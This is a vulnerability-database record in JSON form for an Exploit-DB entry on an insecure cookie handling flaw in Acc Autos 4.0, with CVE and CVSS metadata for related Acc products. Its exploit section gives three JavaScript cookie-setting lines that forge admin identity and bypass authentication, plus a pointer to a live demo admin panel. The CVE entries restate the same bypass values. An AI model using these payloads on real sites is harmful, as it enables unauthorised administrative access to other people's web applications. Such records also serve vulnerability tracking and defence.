Acc Autos 4.0 Insecure Cookie Handling Vulnerability

{"bulletinFamily": "exploit", "id": "EDB-ID:6968", "cvelist": ["CVE-2008-6292", "CVE-2008-6294", "CVE-2008-6293"], "modified": "2008-11-03T00:00:00", "lastseen": "2016-02-01T02:06:25", "edition": 1, "sourceData": "-==========================================-\nAutore: x0r - Road Crew - Evolution Team\nCms: Acc Autos v4.0\nBug: Insecure Cookie Handling\nSite: http://pro7.altervista.org/v2/\n-==========================================-\nExploit:\n\n[+]javascript:document.cookie=\"username_cookie=admin\";\n[+]javascript:document.cookie=\"right_cookie=1\";\n[+]javascript:document.cookie=\"id_cookie=1\";\n\nLive Demo:\n\nhttp://www.accscripts.com/autos/demo/admin/\n\nGreetz: 8\\10\\2008..Il Sogni Diventa Realt\u00c3\u00a0...Bimb4 Ti AmO.\n\n# milw0rm.com [2008-11-03]\n", "published": "2008-11-03T00:00:00", "href": "https://www.exploit-db.com/exploits/6968/", "osvdbidlist": ["49938"], "reporter": "x0r", "hash": "c6b06d96107f36723d001c3b4db500375f12566787b8fd544b6f90e6c941b478", "title": "Acc Autos 4.0 Insecure Cookie Handling Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Acc Autos 4.0 Insecure Cookie Handling Vulnerability. CVE-2008-6292,CVE-2008-6293,CVE-2008-6294. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6968/", "enchantments": {"vulnersScore": 5.1}}

{"result": {"cve": [{"id": "CVE-2008-6292", "type": "cve", "title": "CVE-2008-6292", "description": "Acc Autos 4.0 allows remote attackers to bypass authentication and gain administrative access by setting the (1) username_cookie to \"admin,\" (2) right_cookie to \"1,\" and (3) id_cookie to \"1.\"", "published": "2009-02-26T11:17:19", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6292", "cvelist": ["CVE-2008-6292"], "lastseen": "2016-09-03T11:38:53"}, {"id": "CVE-2008-6294", "type": "cve", "title": "CVE-2008-6294", "description": "admin/Index.php in Acc Statistics 1.1 allows remote attackers to bypass authentication and gain administrative access by setting the username_cookie cookie to \"admin.\"", "published": "2009-02-26T11:17:19", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6294", "cvelist": ["CVE-2008-6294"], "lastseen": "2016-09-03T11:38:55"}, {"id": "CVE-2008-6293", "type": "cve", "title": "CVE-2008-6293", "description": "admin/Index.php in Acc Real Estate 4.0 allows remote attackers to bypass authentication and gain administrative access by setting the username_cookie to \"admin.\"", "published": "2009-02-26T11:17:19", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6293", "cvelist": ["CVE-2008-6293"], "lastseen": "2016-09-03T11:38:54"}], "exploitdb": [{"id": "EDB-ID:6964", "type": "exploitdb", "title": "Acc Real Estate 4.0 Insecure Cookie Handling Vulnerability", "description": "Acc Real Estate 4.0 Insecure Cookie Handling Vulnerability. CVE-2008-6292,CVE-2008-6293,CVE-2008-6294. Webapps exploit for php platform", "published": "2008-11-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6964/", "cvelist": ["CVE-2008-6292", "CVE-2008-6294", "CVE-2008-6293"], "lastseen": "2016-02-01T02:05:50"}, {"id": "EDB-ID:6965", "type": "exploitdb", "title": "Acc Statistics 1.1Insecure Cookie Handling Vulnerability", "description": "Acc Statistics 1.1Insecure Cookie Handling Vulnerability. CVE-2008-6292,CVE-2008-6293,CVE-2008-6294. Webapps exploit for php platform", "published": "2008-11-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6965/", "cvelist": ["CVE-2008-6292", "CVE-2008-6294", "CVE-2008-6293"], "lastseen": "2016-02-01T01:05:59"}]}}